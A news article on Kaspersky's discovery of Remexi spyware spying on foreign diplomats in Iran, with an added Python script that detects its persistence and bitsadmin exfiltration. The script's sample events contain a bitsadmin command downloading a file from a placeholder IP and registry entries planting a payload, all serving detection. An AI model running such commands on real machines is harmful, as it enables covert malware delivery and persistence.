A newly uncovered spyware-slinging operation appears to have been targeting foreign diplomats in Iran for more than three years.
Researchers at Kaspersky Lab said this week that a new build of the Remexi software nasty, first seen in 2015, has been spotted lurking on multiple machines within Iran, mostly those located within what we assume are foreign embassy buildings. The Windows-targeting surveillance-ware was previously associated with a hacking group known as Chafer, and an examination of the latest strain suggests it is of Iranian origin.
"The malware can exfiltrate keystrokes, screenshots, browser-related data like cookies and history, decrypted when possible," Kaspersky's Denis Legezo said of the infection.
"The attackers rely heavily on Microsoft technologies on both the client and server sides: the Trojan uses standard Windows utilities like Microsoft Background Intelligent Transfer Service (BITS) bitsadmin.exe to receive commands and exfiltrate data."
Curiously, Legezo said he does not yet know how the malware is spreading in the wild, just that it is targeting "foreign diplomatic entities" based within Iran.
"So far, our telemetry hasn’t provided any concrete evidence that shows us how the Remexi malware spread," we're told.
"However, we think it’s worth mentioning that for one victim we found a correlation between the execution of Remexi's main module and the execution of an AutoIt script compiled as PE, which we believe may have dropped the malware."
Once on a victim's machine, the spyware is very persistent, hiding out in scheduled tasks or in the Userinit and Run registry keys of the HKLM hive, depending on the version of Windows it has infected. Data is exfiltrated to command-and-control servers using Microsoft's bitsadmin.exe transfer utility.
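As an added illustration that is not from the article or from Kaspersky's write-up, the following Python script flags the two behaviours described above: a Winlogon Userinit value that no longer matches the stock one or a new entry under the HKLM Run key, and bitsadmin.exe being invoked with a URL. It runs over constructed, simplified key=value event lines (not real Sysmon output); the registry paths and the default Userinit value are real Windows values, while the sample events, file names and 203.0.113.5 address are made up.

```python
import re
from typing import Dict, List

# Real registry locations abused for persistence, and the stock Userinit value.
USERINIT_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit"
USERINIT_DEFAULT = r"C:\Windows\system32\userinit.exe,"
RUN_KEY = r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

# Constructed sample events in a simplified key=value layout (EventID 1 = process
# creation, EventID 13 = registry value set, mirroring Sysmon's numbering only).
SAMPLE_EVENTS = [
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe CommandLine="bitsadmin /transfer upd /download /priority normal http://203.0.113.5/t.dat C:\\Users\\Public\\t.dat"',
    'EventID=1 Image=C:\\Windows\\System32\\bitsadmin.exe CommandLine="bitsadmin /list /allusers"',
    'EventID=13 TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" Details="C:\\Windows\\system32\\userinit.exe,C:\\Users\\Public\\svc.exe"',
    'EventID=13 TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit" Details="C:\\Windows\\system32\\userinit.exe,"',
    'EventID=13 TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" Details="C:\\Users\\Public\\svc.exe"',
]

def parse_event(line: str) -> Dict[str, str]:
    """Split one constructed event line into fields; quoted values may contain spaces."""
    return {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}

def check_event(ev: Dict[str, str]) -> List[str]:
    """Return human-readable findings for one event; an empty list means nothing flagged."""
    findings: List[str] = []
    if ev.get("EventID") == "1":
        image = ev.get("Image", "").lower()
        cmd = ev.get("CommandLine", "")
        url = URL_RE.search(cmd)
        # BITS is legitimate; what stands out is bitsadmin talking to a remote URL.
        if image.endswith("\\bitsadmin.exe") and url:
            findings.append(f"bitsadmin.exe transfer to/from {url.group(0)}")
    elif ev.get("EventID") == "13":
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        if target.lower() == USERINIT_KEY.lower() and details.lower() != USERINIT_DEFAULT.lower():
            findings.append(f"Userinit changed from default: {details}")
        elif target.lower().startswith(RUN_KEY.lower() + "\\"):
            value_name = target.rsplit("\\", 1)[-1]
            findings.append(f"new HKLM Run entry: {value_name} -> {details}")
    return findings

def scan(lines: List[str]) -> List[str]:
    """Run every sample line through check_event and collect the findings in order."""
    out: List[str] = []
    for line in lines:
        out.extend(check_event(parse_event(line)))
    return out

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The Userinit check compares against the stock value, so a legitimate multi-entry Userinit on a hardened build would need to be whitelisted rather than treated as an alert.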
According to timestamps in the malware, its development appears to have been completed in March 2018, though there are a few sections of the code that appear to be much older.
While the exact aim of the malware operation is unknown, Kaspersky researchers believe the attack is part of a domestic espionage campaign that seeks to keep an eye on the activity of foreign diplomats in the renegade Mid-East nation. In addition to targeting foreign embassies, researchers pointed to clues such as the use of Farsi language in encryption keys that suggest Iranian operatives are behind the attack.
Iran has been listed as one of the countries particularly active in online espionage operations of late. While the regime uses its malware for espionage and surveillance, Iranian groups have gained a reputation for largely focusing on social media campaigns that aim to advance the country's political interests. ®